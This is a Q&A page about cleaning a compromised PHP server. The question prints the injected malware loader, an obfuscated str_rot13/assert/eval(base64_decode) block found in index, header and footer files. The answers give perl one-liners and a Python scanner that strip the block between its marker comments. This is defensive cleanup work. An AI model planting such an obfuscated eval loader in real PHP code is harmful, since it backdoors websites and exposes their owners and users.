php - Malware attack on my server


All index.php, header.php and footer.php files on the server have this code segment. It is possibly malware. How can I remove this junk data from the files at once? I'm using PHP on a Debian system.

<?php //###=cache start=### error_reporting(0);  $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("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"));')); //###=cache end=### ?> 

I've tried using regex via PHP. Now I've tried sed on the Linux server:

sed -e '/@\$stringd' index.php 

But I'm unable to save the file. Please help.

Reinstalling the server is indeed the safest option.
Without recent backups of the PHP scripts ...

Anyway, sed isn't the best tool for multi-line replacements in files.
You'd want to remove everything between the cache comments.
Use perl or awk for that.

Here's a single-line perl solution that removes those comments from the file.
(It also creates a .bak copy of the original file.)

perl -i.bak -p -0 -e 's@//###=cache.*?cache end=###@@gs' index.php 

Note that @ is used as the separator of the regex. Typically / is used, but this way the / characters don't have to be backslashed in the regex.

For multiple *.php files (without .bak copies):

perl -i -p -0 -e 's@//###=cache.*?cache end=###@@gs' *.php 

The perl flags used:

-i[extension]     edit <> files in place (makes backup if extension supplied)
-p                assume loop like -n but print line also, like sed
-0[octal]         specify record separator (\0, if no argument)
-e program        one line of program (several -e's allowed, omit programfile)
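
The same removal as the perl one-liner above, as an added Python example that is not part of the original answer. It goes a little further: it walks a web root recursively, only reports by default, leaves files with a start marker but no end marker untouched, and drops the empty PHP tag left behind. The name `clean_tree` and the report statuses are choices made for this example.

```python
import re
import shutil
from pathlib import Path

# Marker comments copied from the injected block shown in the question.
START = b"//###=cache start=###"
END = b"//###=cache end=###"
# Non-greedy and DOTALL, so each marker pair is removed separately across lines.
BLOCK = re.compile(re.escape(START) + b".*?" + re.escape(END), re.DOTALL)
# Left behind once the block is gone: a PHP tag pair holding only whitespace.
EMPTY_TAG = re.compile(rb"<\?php\s*\?>\r?\n?")


def clean_tree(root, apply=False):
    """Scan *.php files under root and return {path: status}.

    status is 'infected' (dry run), 'cleaned' (apply=True) or 'unbalanced'
    (start marker without end marker: file is left alone for manual review).
    """
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        data = path.read_bytes()
        if START not in data:
            continue
        cleaned = BLOCK.sub(b"", data)
        if START in cleaned:
            # A truncated or altered block: an automatic edit could cut real code.
            report[str(path)] = "unbalanced"
            continue
        cleaned = EMPTY_TAG.sub(b"", cleaned)
        if apply:
            # Keep the original next to the file, as perl -i.bak does.
            shutil.copy2(path, path.with_name(path.name + ".bak"))
            path.write_bytes(cleaned)
            report[str(path)] = "cleaned"
        else:
            report[str(path)] = "infected"
    return report


if __name__ == "__main__":
    import sys
    # usage: script.py WEBROOT [--apply]; without --apply nothing is modified
    results = clean_tree(sys.argv[1], "--apply" in sys.argv[2:])
    for name, status in results.items():
        print(status, name)
```

Move the `.bak` copies out of the web root afterwards: they still contain the injected code, and depending on the web server configuration a `.bak` file may be served as plain text.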
